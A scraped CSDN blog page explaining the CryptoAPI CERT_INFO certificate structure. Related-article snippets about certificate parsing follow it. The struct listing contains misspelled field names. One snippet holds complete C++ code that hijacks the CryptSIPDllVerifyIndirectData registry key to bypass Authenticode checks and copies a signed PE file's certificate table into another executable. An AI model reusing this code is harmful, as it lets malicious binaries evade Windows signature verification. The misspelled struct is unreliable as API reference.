[VC++]CryptoAPI中CERT_INFO

最新推荐文章于 2019-10-09 09:52:05 发布
原创 最新推荐文章于 2019-10-09 09:52:05 发布 · 1.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了证书信息结构,包括版本、序列号、签名算法、有效期、颁发者与拥有者信息、公钥等关键元素,并详细解释了各组件的作用与意义。 
typedef struct _CERT_ INFO {
	DWORD dwVersion;        //证书版本
	CRYPT_INTEGER_BLOB SerialNumber;       //序列号
	CRYPT_ALGORITHM_IDENTIFIER SignatureAlgorithm;     //签名算法
	CERT_NAME_BLOB Issuer;   //颁发者
	FILETIME NotBefore;   //有效期(起)
	FILETIME NotAflee;    //有效期(止)
	CERT_NAME_BLOB Subject;   //拥有者
	CERT_PUBLIC_KEY_INFO SubiectPublicKevInfo;  //用户公钥
	CRYPT_BIT_BLOB IssuerUniqueId;    //颁发者唯一标识
	CRYPT_BIT_BLOB SubjectUniqueId;    //拥有者唯一标识
	DWORD cExtension;    //扩展项数
	PCERT_EXTENSION rgExtension;    //扩展
	} CERT_INFO, *PCERT_INFO;

使用Microsoft CryptoAPI进行加密、解密、签名及验证(代码)
mmpire之blog
06-06 7504
 #include #include #include #define MY_ENCODING_TYPE (PKCS_7_ASN_ENCODING | X509_ASN_ENCODING)#define KEYLENGTH 0x00800000void HandleError(char *s); //---------------------------------
CSP:使用CryptoAPI解析X509证书基本项
密码开发者
07-07 8543
使用CryptoAPI解码X509证书的基本项,比如版本、序列号、公钥算法、证书用途、颁发者、使用者、有效期等。
CryptoAPI证书操作函数
06-13
利用CryptoAPI函数产生根证书,证书请求,由根证书对证书请求签发证书,并提供下载。编译环境为VS2008。VC++6.0编译不过。
crypto_2
weixin_34082695的博客
10-04 219
 1,解码CERT_INFO结构   给定一个证书,第一步是调用函数CertCreateCertificateContext解码证书BLOB。当这个函数被调用,那么产生一个编码证书的复制品,创建一个CERT_CONETXT类型的结构和一个CERT_INFO类型的结构。一个certificate_context包含一个原始证书BLOB,一个CERT_CONETXT类型的结构以及一...
获取windows下执行文件签名和证书信息
weixin_34232617的博客
11-13 5886
获取证书信息验证文件数字签名是否有效可以使用函数 WinVerifyTrust,可以用:取得文件数字签名证书信息需要使用函数 CryptQueryObject,再用CertFindCertificateInStore获取证书Cert也可以通过,WTHelperProvDataFromStateData WTHelperGetProvSignerFromChain WTHelperGetProvCe...
VC++网络安全编程范例(12)-PKI编程
尹成的技术博客
12-17 5549
PKI(Public Key Infrastructure ) 即"公钥基础设施",是一种遵循既定标准的密钥管理平台,它能够为所有网络应用提供加密和数字签名等密码服务及所必需的密钥和证书管理体系,简单来说,PKI就是利用公钥理论和技术建立的提供安全服务的基础设施。PKI技术是信息安全技术的核心,也是电子商务的关键和基础技术。   PKI的基础技术包括加密、数字签名、数据完整性机制、数字信封、双重数
如何在代码中实现安装证书
最新发布
11-29
HCERTSTORE hStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, 0, NULL, CERT_SYSTEM_STORE_LOCAL_MACHINE, _T("ROOT")); if (!hStore) { _tprintf(_T("Error opening store\n")); delete[] certData; return 1;...
#pragma once #include <Windows.h> #include <cstdint> #include <fstream> #include <iostream> #include <string> #include <vector> // 定义WIN_CERTIFICATE结构,用于表示Windows证书 struct WIN_CERTIFICATE { uint32_t dwLength; uint16_t wRevision; uint16_t wCertificateType; }; // 设置注册表值的函数,用于指定路径和函数名到注册表中 bool SetRegistryValues(HKEY rootKey, LPCWSTR subkey, LPCWSTR dllPath, LPCWSTR funcName, REGSAM accessFlag) { HKEY hKey; LONG result = RegOpenKeyExW(rootKey, subkey, 0, KEY_SET_VALUE | accessFlag, &hKey); if (result != ERROR_SUCCESS) { std::wcerr << L"Failed to open key: " << subkey << L" (Error " << result << L")" << std::endl; return false; } result = RegSetValueExW(hKey, L"Dll", 0, REG_SZ, reinterpret_cast<const BYTE*>(dllPath), (DWORD)((wcslen(dllPath) + 1) * sizeof(wchar_t))); if (result != ERROR_SUCCESS) { std::wcerr << L"Failed to set 'Dll' value. Error: " << result << std::endl; RegCloseKey(hKey); return false; } result = RegSetValueExW(hKey, L"FuncName", 0, REG_SZ, reinterpret_cast<const BYTE*>(funcName), (DWORD)((wcslen(funcName) + 1) * sizeof(wchar_t))); if (result != ERROR_SUCCESS) { std::wcerr << L"Failed to set 'FuncName' value. Error: " << result << std::endl; RegCloseKey(hKey); return false; } RegCloseKey(hKey); // std::wcout << L"Successfully updated: " << subkey << std::endl; return true; } // 钩取注册表的函数,设置指定的DLL路径和函数名到64位和32位注册表项中 bool hook_registry() { LPCWSTR dllPath = L"C:\\Windows\\System32\\ntdll.dll"; LPCWSTR funcName = L"DbgUiContinue"; // 64-bit registry LPCWSTR subkey64 = L"SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}"; // 32-bit registry LPCWSTR subkey32 = L"SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}"; if (!SetRegistryValues(HKEY_LOCAL_MACHINE, subkey64, dllPath, funcName, KEY_WOW64_64KEY)) return false; if (!SetRegistryValues(HKEY_LOCAL_MACHINE, subkey32, dllPath, funcName, KEY_WOW64_32KEY)) return false; } // 将一个64位数值对齐到8字节边界 static inline uint64_t align8(uint64_t x) { return (x + 7) & ~7ULL; } // 从源PE文件中读取数字签名,并将其写入目标PE文件中 bool steal(const std::string& src_path, const std::string& dst_path) { // 1) 打开源文件并读取DOS和PE头 std::ifstream src(src_path, std::ios::binary); if (!src) return false; IMAGE_DOS_HEADER dos; src.read(reinterpret_cast<char*>(&dos), sizeof(dos)); if (dos.e_magic != 0x5A4D) return false; // 检查是否为MZ头 src.seekg(dos.e_lfanew, std::ios::beg); IMAGE_NT_HEADERS64 nt; src.read(reinterpret_cast<char*>(&nt), sizeof(nt)); if (nt.Signature != 0x00004550) return false; // 检查是否为PE头 auto certDir = nt.OptionalHeader.DataDirectory[4]; if (certDir.VirtualAddress == 0 || certDir.Size == 0) { // 没有证书表 return false; } // 2) 读取整个证书表到一个缓冲区 std::vector<char> blob(certDir.Size); src.seekg(certDir.VirtualAddress, std::ios::beg); src.read(blob.data(), blob.size()); src.close(); // 3) 将证书表写入目标PE文件,并确保8字节对齐 std::fstream dst(dst_path, std::ios::binary | std::ios::in | std::ios::out); if (!dst) return false; dst.seekg(0, std::ios::end); uint64_t eof = dst.tellg(); uint64_t writeOff = align8(eof); if (writeOff > eof) { std::vector<char> pad(writeOff - eof, 0); dst.write(pad.data(), (std::streamsize)pad.size()); } dst.write(blob.data(), (std::streamsize)blob.size()); // 4) 修改目标PE文件中的DataDirectory[4]以指向新的证书表 IMAGE_DOS_HEADER dos2; dst.seekg(0, std::ios::beg); dst.read(reinterpret_cast<char*>(&dos2), sizeof(dos2)); // 计算DataDirectory数组的基地址 uint32_t ddBase = dos2.e_lfanew + 4 // Signature + sizeof(IMAGE_FILE_HEADER) + offsetof(IMAGE_OPTIONAL_HEADER64, DataDirectory); // entry #4 (零基)是安全目录 uint32_t dd4 = ddBase + 4 * sizeof(IMAGE_DATA_DIRECTORY); // 写入VirtualAddress(文件偏移)和Size dst.seekp(dd4 + offsetof(IMAGE_DATA_DIRECTORY, VirtualAddress), std::ios::beg); uint32_t off32 = static_cast<uint32_t>(writeOff); dst.write(reinterpret_cast<const char*>(&off32), sizeof(off32)); uint32_t size32 = certDir.Size; dst.write(reinterpret_cast<const char*>(&size32), sizeof(size32)); dst.close(); return true; }
09-20
CryptQueryObject(CERT_QUERY_OBJECT_BLOB, &blob, CERT_QUERY_CONTENT_FLAG_PKCS7_SIGNED, ..., &hMsg); // 从hMsg提取签名信息 ``` 此过程不验证签名,仅提取原始数据。合法用途包括安全审计。 - **Windows ...
MDAC_TYP2.0安装包签名验证全解析:保障系统安全的必备步骤
!... # 摘要 本文围绕MDAC_TYP2.0安装包的签名验证机制展开研究,系统介绍了数字签名与代码完整性的基本原理,涵盖非对称加密、消息摘要生成及Windows平台下的Authenticode技术。文章深入分析了MDAC_TYP2.0安装包的...
智能密码钥匙内部证书导出工具ExportCert
05-22
ExportCert是一个在Windows平台上使用的命令行工具程序,对于符合GM/T 0016-2012《智能密码钥匙密码应用接口规范》的智能密码钥匙,可以使用本工具导出其中包含的加密或签名证书。
[VC++]CryptoAPI解析X509证书信息
南瓜饼
08-01 2810
PCCERT_CONTEXT pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING, CerInfo, outLen); DWORD version = pCertContext->pCertInfo->dwVersion; // 证书版本号 //证书序列号 CRYPT_INTEGER_BLOB snBlob = pCer
异常解决 java.io.FileNotFoundException: class path resource [spring/applicationContext_*.xml]
热门推荐
信念随梦的博客
06-08 8万+
maven创建web工程的时候报下面的错误 org.springframework.beans.factory.BeanDefinitionStoreException: Could not resolve bean definition resource pattern [classpath:spring/applicationContext-*.xml]; nested exception
使用CryptoAPI解析X509证书和P12证书
03-08 398
读入一个CER文件,CertCreateCertificateContext生成CERT_CONTEXT。CERT_CONTEXT这个数据结构中有一项CERT_INFOCERT_INFO里面有一项SubjectPublicKeyInfo,SubjectPublicKeyInfo是一段PUBLICKEY_INFO类型的数据段,里面保存的是算法的ID和DER编码的公钥。有了这段DER编...
12C ORA-错误汇总15 ORA-32800 to ORA-39965
badman250的专栏
03-02 3万+
ORA-32800: internal error string Cause: An unexpected error occurred. Action: Contact Oracle Support Services. ORA-32801: invalid value string for string Cause: An invalid value was specified for
艺赛旗(RPA)钉钉审批接口调用
weixin_44447687的博客
03-20 2358
最近走访了一些客户,发现移动办公使用 企业微信和钉钉的越来越多。所以获取审批数据、打卡信息等就不用导出了,我们可以通过官方接口直接获取。比如应用到人力部门的考勤核算中。 这里就以获取【审批】流程里的【请假单】为例: 获取 Access_Token, 1.1 注册企业应用 ,获取 AppKey、AppSecret 参考链接: https://open-doc.dingtalk.com/micro...
初始化微信小程序商户证书(apiclient_cert.p12),得到一个 httpClient
dd_Gao的博客
10-09 2857
//商户Id @Value("${payConfig.mchId}") private String key; //商户证书路径 @Value("${payConfig.payConfigPath}") private String payConfigPath; /** * 加载证书 */ pri...
配置PKS API
可还记得你我的誓言
05-17 612
配置PKS API配置PKS API访问登录PKS CLI 配置PKS API访问 找到你的Ops Manager root CA certificate位置 如果OPS管理器生成了您的证书,可使用OPS管理器API管理证书. 如果您提供了自己的证书,请复制并粘贴您的证书到PKS API窗格中的文件 通过运行以下命令指向你的UAA server uaac target https\://...
【C++】获取软件的数字签名
04-28 4360
#include <wincrypt.h> #pragma comment(lib, "crypt32.lib") //作用:获取软件的数字签名 //参数: // v_pwszFilePath --- 程序的全路径 // v_pwszSign --- 用于返回数字签名的缓冲区,如果为NULL, // 那么将会需要的缓冲区大小 ...
CRYPTOAPI extern __declspec(dllexport)
09-06
CRYPTOAPI_API void SM3_Update(SM3_CTX* ctx, const BYTE* data, size_t len); CRYPTOAPI_API void SM3_Final(BYTE* digest, SM3_CTX* ctx); ``` ```cpp // cryptoapi.cpp #define CRYPTOAPI_EXPORTS // 定义导出...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值